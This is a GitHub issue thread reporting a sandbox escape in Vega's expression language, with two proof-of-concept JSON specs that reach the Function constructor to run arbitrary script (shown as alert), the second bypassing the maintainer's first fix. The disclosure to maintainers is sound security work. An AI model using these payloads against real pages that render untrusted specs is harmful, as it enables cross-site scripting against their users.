### ISSUE TITLE
Sandbox problem

### ISSUE THREAD

**Issue by RussellSprouts** [vega/vega#444]
Here's a way to execute arbitrary code -- when using a group scope for a scale lookup, we don't check that the group is actually a group before calling its scale method and using the scale it returns. It should be pretty easy to fix -- create a whitelist of group objects that are valid arguments for the scope.

I looked through the rest of the code that gets the values of a signal, and I couldn't find any other similar issues.

```json
{
  "signals": [
    {
      "name": "signal1",
      "streams": [
        {
          "type": "window:mousemove",
          "expr": "{scale:('').constructor.constructor}"
        }
      ]
    },
    {
      "name": "xss",
      "streams": [
        {
          "type": "signal1",
          "expr": "'xss!'",
          "scale": {"name": "alert(arguments[0])", "scope": "signal1"}
        }
      ]
    }
  ]
}
```

**Comment by arvind** [comment]
Fixed with bd08614. Nice catch!

**Comment by RussellSprouts** [comment]
Unfortunately, the fix doesn't quite work.

```json
{
  "signals": [
    {
      "name": "signal1",
      "streams": [
        {
          "type":"@rectangle:mousemove",
          "expr": "{__proto__:eventGroup(), scale: ('').constructor.constructor}",
          "scale": {"name": "alert('xss')", "scope": {"signal": "signal1"}}
        }
      ]
    }
  ],
  "marks": [
    {
      "type": "group",
      "marks": [{
        "name": "rectangle",
        "type": "rect",
        "properties": {
          "enter": {
            "fill": {"value": "red"},
            "width": {"value": 100},
            "height": {"value": 100}
          }
        }
      }]
    }  
  ]
}
```

Hover the red square to trigger it.
